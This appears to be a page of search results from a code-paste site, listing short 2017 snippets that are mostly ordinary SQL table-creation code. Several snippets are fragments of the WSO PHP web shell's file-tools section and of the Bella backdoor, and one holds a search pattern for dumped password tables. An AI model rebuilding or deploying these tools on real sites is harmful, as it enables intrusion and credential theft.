42.7K results in 942 ms
9 years ago · Apr 19, 2017, 07:54 PM
foreign key references prisliste(prislisteID) NOT NULL ) create table ordrelinje( ordrelinjeID int primary
9 years ago · Apr 19, 2017, 04:04 PM
switch ($this->options['type']) { case "zip": if (!$this->create_zip()) { $this->error[] = "Could not create zip file."; return 0;
9 years ago · Apr 19, 2017, 03:40 PM
spring.h2.console.enabled=true Hibernate: drop table if exists member Hibernate: create table member (id bigint not null auto_increment, biography varchar(255),
9 years ago · Apr 19, 2017, 02:22 PM
foreign key references prisliste(prislisteID) NOT NULL ) create table ordrelinje( ordrelinjeID int primary
9 years ago · Apr 19, 2017, 01:00 PM
database except: pickle.dump({},open(FILENAME, "wb")) # If database not present in directory, create file except EOFError: pass
9 years ago · Apr 19, 2017, 12:18 PM
if EXISTS users' db.execute 'CREATE TABLE IF NOT EXISTS Users ( name TEXT, email
9 years ago · Apr 19, 2017, 01:32 AM
debug self.__dbConnection.row_factory = sqlite3.Row self.__dbConnection.execute('''create table if not exists {} ({} text, {} text, {} int, {} text,
9 years ago · Apr 18, 2017, 06:56 PM
password "# Dumping data for table (username|user|users|password)" "# Dumping data for
9 years ago · Apr 18, 2017, 05:40 PM
Started getty on tty2-tty6 if dbus and logind are not available. Apr 02 14:50:41
9 years ago · Apr 17, 2017, 10:12 PM
remove_SUID_shell() #remove if it exists data = recv_msg(bella_connection) if not data: break #start listening
9 years ago · Apr 17, 2017, 07:06 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Apr 17, 2017, 07:02 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Apr 16, 2017, 07:38 PM
structure for table `xf_user` -- CREATE TABLE IF NOT EXISTS `xf_user` ( `user_id` int(10) unsigned
9 years ago · Apr 16, 2017, 02:46 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Apr 16, 2017, 09:02 AM
typeof(value) != "undefined") database.transaction(function(tx) { tx.executeSql("CREATE TABLE IF NOT EXISTS cache(" + "id INTEGER NOT
9 years ago · Apr 16, 2017, 09:02 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Apr 15, 2017, 10:20 PM
Statement)conn.createStatement(); System.out.println("INIT TEST"); stat.execute("CREATE TABLE IF NOT EXISTS users(userID INTEGER NOT NULL
Total pages: 2134